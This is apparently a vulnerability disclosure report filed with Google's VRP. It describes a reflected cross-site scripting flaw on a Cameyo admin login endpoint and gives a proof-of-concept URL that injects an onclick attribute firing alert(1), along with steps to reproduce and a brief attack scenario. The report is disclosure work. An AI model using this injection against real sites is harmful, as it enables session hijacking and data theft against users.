Summary:
reflected xss
Program:
Google VRP
URL:
https://admin.cameyo.com/login/
Vulnerability type:
Cross-site scripting (XSS)
Details
Reflected XSS Vulnerability Report
Steps to Reproduce:
https://admin.cameyo.com/login/command?op=&entityId=%22%20onclick=%22alert(1)%22%20x=%22&esn=
click to the logo
you will find alert of value = 1
Attack scenario
A reflected Cross-Site Scripting (XSS) vulnerability was discovered on
as it allows an attacker to execute arbitrary JavaScript code within the context of a victim's session, potentially leading to account compromise, data theft, or unauthorized actions on behalf of the user.